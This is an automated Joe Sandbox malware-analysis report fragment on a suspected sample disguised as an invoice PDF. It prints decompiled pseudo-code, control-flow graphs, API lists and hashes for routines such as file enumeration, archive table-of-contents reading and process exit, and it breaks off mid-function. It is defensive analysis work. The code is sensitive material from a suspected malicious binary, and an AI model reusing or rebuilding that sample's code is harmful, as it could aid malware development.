                            0x00000000
                            0x0131d75c
                            0x0131d6f5
                            0x0131d6f8
                            0x0131d6fa
                            0x0131d6fd
                            0x0131d6ff
                            0x0131d701
                            0x0131d737
                            0x0131d745
                            0x0131d74b
                            0x0131d74d
                            0x0131d761
                            0x00000000
                            0x0131d761
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0131d703
                            0x0131d703
                            0x0131d703
                            0x0131d706
                            0x0131d709
                            0x0131d70b
                            0x00000000
                            0x00000000
                            0x0131d715
                            0x0131d71c
                            0x0131d71f
                            0x0131d721
                            0x0131d729
                            0x0131d729
                            0x0131d72c
                            0x0131d72d
                            0x0131d730
                            0x0131d732
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0131d732
                            0x0131d723
                            0x0131d724
                            0x0131d727
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0131d727
                            0x0131d734
                            0x00000000
                            0x0131d734
                            0x0131d6a5
                            0x0131d6a7
                            0x00000000
                            0x00000000
                            0x0131d6ad
                            0x0131d6b0
                            0x0131d6b4
                            0x0131d6b7
                            0x0131d6bb
                            0x00000000
                            0x00000000
                            0x0131d6c1
                            0x0131d6c2
                            0x0131d6c5
                            0x0131d6c7
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0131d6c9
                            0x00000000
                            0x0131d6b0
                            0x0131d674
                            0x00000000
                            0x0131d67f
                            0x0131d661
                            0x0131d667
                            0x00000000
                            0x0131d667
                            0x0131d7be

                            APIs
                            • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,?,?,?), ref: 0131D6DC
                            • GetLastError.KERNEL32 ref: 0131D6EA
                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?), ref: 0131D745
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide$ErrorLast
                            • String ID:
                            • API String ID: 1717984340-0
                            • Opcode ID: b09e79399e038a8ec992b5d20ba34476e85cf8a5c2cf9d57411337b18def80dc
                            • Instruction ID: 444b596832ea90282e26e2333ef3e722be24a61a2ae4c9c4c85aea112fd5360e
                            • Opcode Fuzzy Hash: b09e79399e038a8ec992b5d20ba34476e85cf8a5c2cf9d57411337b18def80dc
                            • Instruction Fuzzy Hash: E541F931600286AFDB2A9FECC84CBAEBBB9EF43328F144169F95957199D7318901C750
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Analysis Process: svchost.exe PID: 6308 Parent PID: 3352 svchost.exeCOMMON

                            Executed Functions

                            Function 00BCE260, Relevance: 6.2, APIs: 4, Instructions: 196fileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 562 bce260-bce27e 563 bce295-bce297 562->563 564 bce280-bce293 call bcc9ce call bd1788 562->564 563->564 565 bce299-bce2b4 FindFirstFileExW 563->565 579 bce2e2-bce2f0 call bc786a 564->579 567 bce2b6-bce2c1 GetLastError 565->567 568 bce307-bce375 call bce4a6 * 3 call bd618c 565->568 570 bce2d2-bce2d7 call bcc9ce 567->570 571 bce2c3-bce2c6 567->571 597 bce37e-bce3a7 call bd1798 568->597 598 bce377-bce379 568->598 588 bce2dd 570->588 575 bce2fe-bce305 call bcc9ce 571->575 576 bce2c8-bce2cb 571->576 575->588 581 bce2cd-bce2d0 576->581 582 bce2f1-bce2fc call bcc9ce 576->582 581->570 581->575 582->588 592 bce2e0-bce2e1 588->592 592->579 601 bce3a9-bce3b4 call bcc9ce call bd1788 597->601 602 bce3cb-bce3ce 597->602 598->592 610 bce3b9 601->610 602->601 604 bce3d0-bce3d2 602->604 604->601 606 bce3d4-bce3e4 FindNextFileW 604->606 608 bce425-bce493 call bce4a6 * 3 call bd618c 606->608 609 bce3e6-bce3f1 GetLastError 606->609 615 bce3bc-bce3ca call bc786a 608->615 634 bce499-bce4a5 call bd1798 608->634 612 bce402-bce40d call bcc9ce 609->612 613 bce3f3-bce3f6 609->613 610->615 612->610 617 bce41c-bce423 call bcc9ce 613->617 618 bce3f8-bce3fb 613->618 617->610 619 bce3fd-bce400 618->619 620 bce40f-bce41a call bcc9ce 618->620 619->612 619->617 620->610
                            C-Code - Quality: 73%
                            			E00BCE260(void* __ebx, signed int __edx, void* __edi, void* __esi, WCHAR* _a4, signed int* _a8) {
				signed int _v8;
				void* _v12;
				void* _v16;
				struct _SYSTEMTIME _v32;
				struct _SYSTEMTIME _v48;
				char _v556;
				char _v580;
				char _v588;
				char _v596;
				struct _WIN32_FIND_DATAW _v604;
				signed int* _v632;
				void* _v636;
				signed int _v648;
				FILETIME* _v1260;
				signed int _v1272;
				signed int _t54;
				WCHAR* _t56;
				signed int _t59;
				signed int _t60;
				signed int _t65;
				signed int _t66;
				signed int _t67;
				void* _t71;
				signed int _t73;
				void* _t75;
				signed int _t77;
				signed int _t78;
				int _t79;
				signed int _t84;
				signed int _t85;
				signed int _t86;
				signed int _t92;
				FILETIME* _t94;
				signed int _t95;
				long _t104;
				long _t105;
				signed int _t106;
				signed int _t119;
				signed int _t122;
				signed int* _t125;
				signed int* _t127;
				void* _t129;
				void* _t130;
				signed int _t131;
				signed int _t132;
				void* _t134;
				signed int _t135;
				void* _t136;
				signed int _t137;

				_t119 = __edx;
				_t54 =  *0xbec008; // 0xdc55bb75
				_v8 = _t54 ^ _t131;
				_t56 = _a4;
				_push(__esi);
				_t125 = _a8;
				if(_t125 != 0) {
					if(_t56 == 0) {
						goto L1;
					} else {
						_push(__ebx);
						_t60 = FindFirstFileExW(_t56, 0,  &(_v604.ftCreationTime), 0, 0, 0); // executed
						_t122 = _t60;
						if(_t122 != 0xffffffff) {
							asm("sbb eax, eax");
							 *_t125 =  ~(_v604.ftCreationTime + 0xffffff80) & _v604.ftCreationTime;
							_t65 =  &_v596;
							_push(_t65); // executed
							L33(); // executed
							_t125[2] = _t65;
							_t66 =  &_v588;
							_push(_t66);
							_t125[3] = _t119;
							L33(); // executed
							_t125[4] = _t66;
							_t67 =  &_v580;
							_push(_t67);
							_t125[5] = _t119;
							L33(); // executed
							_t125[6] = _t67;
							_t125[8] = _v604.dwReserved0;
							_t125[7] = _t119;
							_t71 = E00BD618C( &(_t125[9]), 0x104,  &_v556);
							_t135 = _t134 + 0x18;
							if(_t71 != 0) {
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E00BD1798();
								asm("int3");
								_push(_t131);
								_t132 = _t135;
								_t136 = _t135 - 0x254;
								_t73 =  *0xbec008; // 0xdc55bb75
								_v648 = _t73 ^ _t132;
								_t75 = _v636;
								_push(_t125);
								_t127 = _v632;
								if(_t75 != 0) {
									if(_t75 == 0xffffffff || _t127 == 0) {
										goto L18;
									} else {
										_t79 = FindNextFileW(_t75,  &_v604); // executed
										if(_t79 != 0) {
											asm("sbb eax, eax");
											 *_t127 =  ~(_v604.dwFileAttributes + 0xffffff80) & _v604.dwFileAttributes;
											_t84 =  &(_v604.ftCreationTime);
											_push(_t84);
											L33();
											_t127[2] = _t84;
											_t85 =  &(_v604.ftLastAccessTime);
											_push(_t85);
											_t127[3] = _t119;
											L33();
											_t127[4] = _t85;
											_t86 =  &(_v604.ftLastWriteTime);
											_push(_t86);
											_t127[5] = _t119;
											L33();
											_t127[6] = _t86;
											_t127[8] = _v604.nFileSizeLow;
											_t127[7] = _t119;
											_t78 = E00BD618C( &(_t127[9]), 0x104,  &(_v604.cFileName));
											_t137 = _t136 + 0x18;
											if(_t78 == 0) {
												goto L20;
											} else {
												_push(0);
												_push(0);
												_push(0);
												_push(0);
												_push(0);
												E00BD1798();
												asm("int3");
												_push(_t132);
												_t92 =  *0xbec008; // 0xdc55bb75
												_v1272 = _t92 ^ _t137;
												_t94 = _v1260;
												if(_t94->dwLowDateTime != 0 || _t94->dwHighDateTime != 0) {
													_t94 = FileTimeToSystemTime(_t94,  &_v48);
													if(_t94 == 0) {
														goto L35;
													} else {
														_t94 = SystemTimeToTzSpecificLocalTime(0,  &_v48,  &_v32); // executed
														if(_t94 == 0) {
															goto L35;
														} else {
															_push(0xffffffff);
															_push(_v32.wSecond & 0x0000ffff);
															_t95 = E00BD56B5(0, _t119, _t127, _v32.wYear & 0x0000ffff, _v32.wMonth & 0x0000ffff, _v32.wDay & 0x0000ffff, _v32.wHour & 0x0000ffff, _v32.wMinute & 0x0000ffff); // executed
														}
													}
												} else {
													L35:
													_t95 = _t94 | 0xffffffff;
												}
												E00BC786A();
												return _t95;
											}
										} else {
											_t104 = GetLastError();
											_t129 = 2;
											if(_t104 < _t129) {
												L28:
												_t77 = E00BCC9CE();
												 *_t77 = 0x16;
												goto L19;
											} else {
												if(_t104 <= 3) {
													L30:
													_t77 = E00BCC9CE();
													 *_t77 = _t129;
													goto L19;
												} else {
													if(_t104 == 8) {
														_t77 = E00BCC9CE();
														 *_t77 = 0xc;
														goto L19;
													} else {
														if(_t104 == 0x12) {
															goto L30;
														} else {
															goto L28;
														}
													}
												}
											}
										}
									}
								} else {
									L18:
									 *((intOrPtr*)(E00BCC9CE())) = 0x16;
									_t77 = E00BD1788();
									L19:
									_t78 = _t77 | 0xffffffff;
									L20:
									E00BC786A();
									return _t78;
								}
							} else {
								_t59 = _t122;
								goto L10;
							}
						} else {
							_t105 = GetLastError();
							_t130 = 2;
							if(_t105 < _t130) {
								L8:
								_t106 = E00BCC9CE();
								 *_t106 = 0x16;
							} else {
								if(_t105 <= 3) {
									L13:
									_t106 = E00BCC9CE();
									 *_t106 = _t130;
								} else {
									if(_t105 == 8) {
										_t106 = E00BCC9CE();
										 *_t106 = 0xc;
									} else {
										if(_t105 == 0x12) {
											goto L13;
										} else {
											goto L8;
										}
									}
								}
							}
							_t59 = _t106 | 0xffffffff;
							L10:
							goto L11;
						}
					}
				} else {
					L1:
					 *((intOrPtr*)(E00BCC9CE())) = 0x16;
					_t59 = E00BD1788() | 0xffffffff;
					L11:
					E00BC786A();
					return _t59;
				}
			}




















































                            0x00bce260
                            0x00bce26b
                            0x00bce272
                            0x00bce275
                            0x00bce278
                            0x00bce279
                            0x00bce27e
                            0x00bce297
                            0x00000000
                            0x00bce299
                            0x00bce299
                            0x00bce2a9
                            0x00bce2af
                            0x00bce2b4
                            0x00bce312
                            0x00bce31a
                            0x00bce31c
                            0x00bce322
                            0x00bce323
                            0x00bce328
                            0x00bce32b
                            0x00bce331
                            0x00bce332
                            0x00bce335
                            0x00bce33a
                            0x00bce33d
                            0x00bce343
                            0x00bce344
                            0x00bce347
                            0x00bce34c
                            0x00bce355
                            0x00bce362
                            0x00bce36b
                            0x00bce370
                            0x00bce375
                            0x00bce37e
                            0x00bce37f
                            0x00bce380
                            0x00bce381
                            0x00bce382
                            0x00bce383
                            0x00bce388
                            0x00bce38b
                            0x00bce38c
                            0x00bce38e
                            0x00bce394
                            0x00bce39b
                            0x00bce39e
                            0x00bce3a1
                            0x00bce3a2
                            0x00bce3a7
                            0x00bce3ce
                            0x00000000
                            0x00bce3d4
                            0x00bce3dc
                            0x00bce3e4
                            0x00bce430
                            0x00bce438
                            0x00bce43a
                            0x00bce440
                            0x00bce441
                            0x00bce446
                            0x00bce449
                            0x00bce44f
                            0x00bce450
                            0x00bce453
                            0x00bce458
                            0x00bce45b
                            0x00bce461
                            0x00bce462
                            0x00bce465
                            0x00bce46a
                            0x00bce473
                            0x00bce480
                            0x00bce489
                            0x00bce48e
                            0x00bce493
                            0x00000000
                            0x00bce499
                            0x00bce49b
                            0x00bce49c
                            0x00bce49d
                            0x00bce49e
                            0x00bce49f
                            0x00bce4a0
                            0x00bce4a5
                            0x00bce4a8
                            0x00bce4ae
                            0x00bce4b5
                            0x00bce4b8
                            0x00bce4be
                            0x00bce4d2
                            0x00bce4da
                            0x00000000
                            0x00bce4dc
                            0x00bce4e6
                            0x00bce4ee
                            0x00000000
                            0x00bce4f0
                            0x00bce4f4
                            0x00bce4f6
                            0x00bce510
                            0x00bce515
                            0x00bce4ee
                            0x00bce4c6
                            0x00bce4c6
                            0x00bce4c6
                            0x00bce4c9
                            0x00bce51d
                            0x00bce525
                            0x00bce525
                            0x00bce3e6
                            0x00bce3e6
                            0x00bce3ee
                            0x00bce3f1
                            0x00bce402
                            0x00bce402
                            0x00bce407
                            0x00000000
                            0x00bce3f3
                            0x00bce3f6
                            0x00bce41c
                            0x00bce41c
                            0x00bce421
                            0x00000000
                            0x00bce3f8
                            0x00bce3fb
                            0x00bce40f
                            0x00bce414
                            0x00000000
                            0x00bce3fd
                            0x00bce400
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00bce400
                            0x00bce3fb
                            0x00bce3f6
                            0x00bce3f1
                            0x00bce3e4
                            0x00bce3a9
                            0x00bce3a9
                            0x00bce3ae
                            0x00bce3b4
                            0x00bce3b9
                            0x00bce3b9
                            0x00bce3bc
                            0x00bce3c2
                            0x00bce3ca
                            0x00bce3ca
                            0x00bce377
                            0x00bce377
                            0x00000000
                            0x00bce377
                            0x00bce2b6
                            0x00bce2b6
                            0x00bce2be
                            0x00bce2c1
                            0x00bce2d2
                            0x00bce2d2
                            0x00bce2d7
                            0x00bce2c3
                            0x00bce2c6
                            0x00bce2fe
                            0x00bce2fe
                            0x00bce303
                            0x00bce2c8
                            0x00bce2cb
                            0x00bce2f1
                            0x00bce2f6
                            0x00bce2cd
                            0x00bce2d0
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00bce2d0
                            0x00bce2cb
                            0x00bce2c6
                            0x00bce2dd
                            0x00bce2e0
                            0x00000000
                            0x00bce2e1
                            0x00bce2b4
                            0x00bce280
                            0x00bce280
                            0x00bce285
                            0x00bce290
                            0x00bce2e2
                            0x00bce2e8
                            0x00bce2f0
                            0x00bce2f0

                            APIs
                            • FindFirstFileExW.KERNELBASE(?,00000000,?,00000000,00000000,00000000), ref: 00BCE2A9
                            • GetLastError.KERNEL32 ref: 00BCE2B6
                              • Part of subcall function 00BCE4A6: FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,00BCE328,?), ref: 00BCE4D2
                              • Part of subcall function 00BCE4A6: SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,00BCE328,?,?,?,?,00BCE328,?), ref: 00BCE4E6
                            • FindNextFileW.KERNELBASE(?,?,?), ref: 00BCE3DC
                            • GetLastError.KERNEL32 ref: 00BCE3E6
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: Time$File$ErrorFindLastSystem$FirstLocalNextSpecific
                            • String ID:
                            • API String ID: 3693236040-0
                            • Opcode ID: d8383f7d390e8914874baed9cd23e6f7a172f74f62623f8a52cc1dc8c19a67a8
                            • Instruction ID: c8e27a41ee008c7659ea16d4f282a29c8d79e6f9ab7952f3b1d49ba3ad9452bc
                            • Opcode Fuzzy Hash: d8383f7d390e8914874baed9cd23e6f7a172f74f62623f8a52cc1dc8c19a67a8
                            • Instruction Fuzzy Hash: 32616371900618DBC725AF64CC85FAEB7E8EF45310F100ADEF466DB291EA74E9848B51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BD0158, Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00BD0158(int _a4) {
				void* _t7;
				void* _t14;

				_t7 = E00BD3A8A(_t14); // executed
				if(_t7 != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E00BD01DD(_t14, _a4);
				ExitProcess(_a4);
			}





                            0x00bd015d
                            0x00bd0164
                            0x00bd0180
                            0x00bd0180
                            0x00bd0189
                            0x00bd0192

                            APIs
                            • GetCurrentProcess.KERNEL32(?,?,00BD012E,?,00BEA6E0,0000000C,00BD0285,?,00000002,00000000), ref: 00BD0179
                            • TerminateProcess.KERNEL32(00000000,?,00BD012E,?,00BEA6E0,0000000C,00BD0285,?,00000002,00000000), ref: 00BD0180
                            • ExitProcess.KERNEL32 ref: 00BD0192
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: Process$CurrentExitTerminate
                            • String ID:
                            • API String ID: 1703294689-0
                            • Opcode ID: 0028a958ab6ba8e6bf7cab1c297951fda38d626cb413f0eaeabacc26406dfd57
                            • Instruction ID: f7df19ccea1d28d888b565b5530267ccda10905c876d93edc68efbf7a8416528
                            • Opcode Fuzzy Hash: 0028a958ab6ba8e6bf7cab1c297951fda38d626cb413f0eaeabacc26406dfd57
                            • Instruction Fuzzy Hash: 4CE04631420188BFCF117F90CD48B497BA9FB00781F000059F808AB222EB75DE82CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BC1560, Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 95COMMON
                            Download Yara Rule

                            Control-flow Graph

                            C-Code - Quality: 50%
                            			E00BC1560(void* __ecx, void* __edx, void* __ebp, signed int* _a4) {
				void* _t14;
				signed int _t15;
				void* _t18;
				signed int _t19;
				void* _t20;
				signed int _t26;
				signed int _t28;
				void* _t31;
				void* _t32;
				signed int* _t33;
				void* _t35;
				void* _t36;

				_t32 = __edx;
				_t31 = __ecx;
				_t33 = _a4;
				if( *_t33 != 0) {
					L2:
					_t14 = E00BC1120(_t32, _t33);
					_t36 = _t35 + 4;
					_t48 = _t14 - 1;
					if(_t14 < 1) {
						E00BC9F16(_t32,  *_t33, 0, 2); // executed
						_t14 = E00BCA488(_t32, _t48,  *_t33); // executed
						_t36 = _t36 + 0x10;
					}
					_t15 = E00BC13D0(_t32, _t33, _t14);
					if(_t15 == 0xffffffff) {
						goto L7;
					} else {
						_t3 =  &(_t33[9]); // 0x1
						_push( *_t3);
						_t33[0x101b] = 0;
						L00BC7864();
						_push(0);
						 *0xbec954 = _t15;
						_t5 =  &(_t33[7]); // 0xc0335f00
						L00BC7864();
						_t6 =  &(_t33[1]); // 0x1a74c085
						_t18 = E00BC9F16(_t32,  *_t33, _t15 +  *_t6,  *_t5); // executed
						_t7 =  &(_t33[8]); // 0xb85fc35b
						_push( *_t7);
						L00BC7864();
						_push(_t18);
						_t19 = E00BC9808(_t31);
						_t33[2] = _t19;
						_t50 = _t19;
						if(_t19 != 0) {
							_push( *_t33);
							_t9 =  &(_t33[8]); // 0xb85fc35b
							L00BC7864();
							_t10 =  &(_t33[2]); // 0xc085078b, executed
							_t20 = E00BC9B2B( *_t10, _t19,  *_t9, 1); // executed
							__eflags = _t20 - 1;
							if(__eflags >= 0) {
								_t11 =  &(_t33[8]); // 0xb85fc35b
								_push( *_t11);
								L00BC7864();
								_t12 =  &(_t33[2]); // 0xc085078b
								_t33[3] = _t20 +  *_t12;
								__eflags = E00BC9934( *_t33);
								if(__eflags == 0) {
									E00BC1200(_t33);
									__eflags = 0;
									return 0;
								} else {
									_push("Error on file\n.");
									_t26 = E00BC1910(__eflags) | 0xffffffff;
									__eflags = _t26;
									return _t26;
								}
							} else {
								_push("Could not read from file.");
								_push("fread");
								_t28 = E00BC17B0(__eflags) | 0xffffffff;
								__eflags = _t28;
								return _t28;
							}
						} else {
							_push("Could not allocate buffer for TOC.");
							_push("malloc");
							_t15 = E00BC17B0(_t50);
							goto L7;
						}
					}
				} else {
					_t2 =  &(_t33[0x1a]); // 0xbc176c
					_t15 = E00BC28C0(_t2, "rb");
					_t35 = _t35 + 8;
					 *_t33 = _t15;
					if(_t15 == 0) {
						L7:
						return _t15 | 0xffffffff;
					} else {
						goto L2;
					}
				}
			}















                            0x00bc1560
                            0x00bc1560
                            0x00bc1561
                            0x00bc1568
                            0x00bc1585
                            0x00bc1586
                            0x00bc158b
                            0x00bc158e
                            0x00bc1591
                            0x00bc1599
                            0x00bc15a0
                            0x00bc15a5
                            0x00bc15a5
                            0x00bc15aa
                            0x00bc15b5
                            0x00000000
                            0x00bc15b7
                            0x00bc15b7
                            0x00bc15b7
                            0x00bc15ba
                            0x00bc15c4
                            0x00bc15c9
                            0x00bc15cb
                            0x00bc15d0
                            0x00bc15d3
                            0x00bc15d8
                            0x00bc15de
                            0x00bc15e6
                            0x00bc15e6
                            0x00bc15e9
                            0x00bc15ee
                            0x00bc15ef
                            0x00bc15f7
                            0x00bc15fa
                            0x00bc15fc
                            0x00bc1615
                            0x00bc1619
                            0x00bc161c
                            0x00bc1622
                            0x00bc1625
                            0x00bc162d
                            0x00bc1630
                            0x00bc1649
                            0x00bc1649
                            0x00bc164c
                            0x00bc1651
                            0x00bc1656
                            0x00bc1661
                            0x00bc1663
                            0x00bc1678
                            0x00bc1680
                            0x00bc1683
                            0x00bc1665
                            0x00bc1665
                            0x00bc1672
                            0x00bc1672
                            0x00bc1676
                            0x00bc1676
                            0x00bc1632
                            0x00bc1632
                            0x00bc1637
                            0x00bc1644
                            0x00bc1644
                            0x00bc1648
                            0x00bc1648
                            0x00bc15fe
                            0x00bc15fe
                            0x00bc1603
                            0x00bc1608
                            0x00000000
                            0x00bc160d
                            0x00bc15fc
                            0x00bc156a
                            0x00bc156a
                            0x00bc1573
                            0x00bc1578
                            0x00bc157b
                            0x00bc157f
                            0x00bc1610
                            0x00bc1614
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00bc157f

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: htonl$__fread_nolock
                            • String ID: Could not allocate buffer for TOC.$Could not read from file.$Error on file.$fread$malloc
                            • API String ID: 3757756281-2332847760
                            • Opcode ID: 25ed3d59da06afe63bf290c617b581642314ce4626c1c0ffdbd9048188214c1a
                            • Instruction ID: eb39f4b92f98aa1f145c8edec88a18544ea6feaf076d5932ffa5975d83457124
                            • Opcode Fuzzy Hash: 25ed3d59da06afe63bf290c617b581642314ce4626c1c0ffdbd9048188214c1a
                            • Instruction Fuzzy Hash: 5C21E9B5850700ABEA207B39AC07F5A76E4AF11354F140EECF599A02E3FB72E5508A56
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BD2128, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 300COMMONLIBRARYCODE
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 39 bd2128-bd2138 40 bd213a-bd214d call bcc9bb call bcc9ce 39->40 41 bd2152-bd2154 39->41 55 bd24d4 40->55 42 bd24bc-bd24c9 call bcc9bb call bcc9ce 41->42 43 bd215a-bd2160 41->43 60 bd24cf call bd1788 42->60 43->42 45 bd2166-bd2191 43->45 45->42 48 bd2197-bd21a0 45->48 52 bd21ba-bd21bc 48->52 53 bd21a2-bd21b5 call bcc9bb call bcc9ce 48->53 58 bd24b8-bd24ba 52->58 59 bd21c2-bd21c6 52->59 53->60 61 bd24d7-bd24dc 55->61 58->61 59->58 63 bd21cc-bd21d0 59->63 60->55 63->53 66 bd21d2-bd21e9 63->66 68 bd21eb-bd21ee 66->68 69 bd2206-bd220f 66->69 72 bd21f8-bd2201 68->72 73 bd21f0-bd21f6 68->73 70 bd222d-bd2237 69->70 71 bd2211-bd2228 call bcc9bb call bcc9ce call bd1788 69->71 76 bd223e-bd225c call bd0a25 call bd09eb * 2 70->76 77 bd2239-bd223b 70->77 103 bd23ef 71->103 74 bd22a2-bd22bc 72->74 73->71 73->72 79 bd2390-bd2399 call bd8d71 74->79 80 bd22c2-bd22d2 74->80 107 bd225e-bd2274 call bcc9ce call bcc9bb 76->107 108 bd2279-bd229f call bd2807 76->108 77->76 91 bd240c 79->91 92 bd239b-bd23ad 79->92 80->79 84 bd22d8-bd22da 80->84 84->79 88 bd22e0-bd2306 84->88 88->79 93 bd230c-bd231f 88->93 95 bd2410-bd2428 ReadFile 91->95 92->91 97 bd23af-bd23be GetConsoleMode 92->97 93->79 98 bd2321-bd2323 93->98 101 bd242a-bd2430 95->101 102 bd2484-bd248f GetLastError 95->102 97->91 104 bd23c0-bd23c4 97->104 98->79 105 bd2325-bd2350 98->105 101->102 111 bd2432 101->111 109 bd24a8-bd24ab 102->109 110 bd2491-bd24a3 call bcc9ce call bcc9bb 102->110 113 bd23f2-bd23fc call bd09eb 103->113 104->95 112 bd23c6-bd23e0 ReadConsoleW 104->112 105->79 106 bd2352-bd2365 105->106 106->79 115 bd2367-bd2369 106->115 107->103 108->74 122 bd23e8-bd23ee call bcc998 109->122 123 bd24b1-bd24b3 109->123 110->103 119 bd2435-bd2447 111->119 120 bd2401-bd240a 112->120 121 bd23e2 GetLastError 112->121 113->61 115->79 125 bd236b-bd238b 115->125 119->113 129 bd2449-bd244d 119->129 120->119 121->122 122->103 123->113 125->79 133 bd244f-bd245f call bd1e42 129->133 134 bd2466-bd2471 129->134 146 bd2462-bd2464 133->146 139 bd247d-bd2482 call bd1c82 134->139 140 bd2473 call bd1f94 134->140 144 bd2478-bd247b 139->144 140->144 144->146 146->113
                            C-Code - Quality: 77%
                            			E00BD2128(signed int _a4, void* _a8, unsigned int _a12) {
				signed int _v5;
				char _v6;
				void* _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _v32;
				long _v36;
				void* _v40;
				long _v44;
				signed int* _t143;
				signed int _t145;
				intOrPtr _t149;
				signed int _t153;
				signed int _t155;
				signed char _t157;
				unsigned int _t158;
				intOrPtr _t162;
				void* _t163;
				signed int _t164;
				signed int _t167;
				long _t168;
				intOrPtr _t175;
				signed int _t176;
				intOrPtr _t178;
				signed int _t180;
				signed int _t184;
				char _t191;
				char* _t192;
				char _t199;
				char* _t200;
				signed char _t211;
				signed int _t213;
				long _t215;
				signed int _t216;
				char _t218;
				signed char _t222;
				signed int _t223;
				unsigned int _t224;
				intOrPtr _t225;
				unsigned int _t229;
				intOrPtr _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed char _t236;
				signed int _t237;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t246;
				void* _t248;
				void* _t249;

				_t213 = _a4;
				if(_t213 != 0xfffffffe) {
					__eflags = _t213;
					if(_t213 < 0) {
						L58:
						_t143 = E00BCC9BB();
						 *_t143 =  *_t143 & 0x00000000;
						__eflags =  *_t143;
						 *((intOrPtr*)(E00BCC9CE())) = 9;
						L59:
						_t145 = E00BD1788();
						goto L60;
					}
					__eflags = _t213 -  *0xbf6308; // 0x40
					if(__eflags >= 0) {
						goto L58;
					}
					_v24 = 1;
					_t239 = _t213 >> 6;
					_t235 = (_t213 & 0x0000003f) * 0x30;
					_v20 = _t239;
					_t149 =  *((intOrPtr*)(0xbf6108 + _t239 * 4));
					_v28 = _t235;
					_t222 =  *((intOrPtr*)(_t235 + _t149 + 0x28));
					_v5 = _t222;
					__eflags = _t222 & 0x00000001;
					if((_t222 & 0x00000001) == 0) {
						goto L58;
					}
					_t223 = _a12;
					__eflags = _t223 - 0x7fffffff;
					if(_t223 <= 0x7fffffff) {
						__eflags = _t223;
						if(_t223 == 0) {
							L57:
							return 0;
						}
						__eflags = _v5 & 0x00000002;
						if((_v5 & 0x00000002) != 0) {
							goto L57;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							goto L6;
						}
						_t153 =  *((intOrPtr*)(_t235 + _t149 + 0x29));
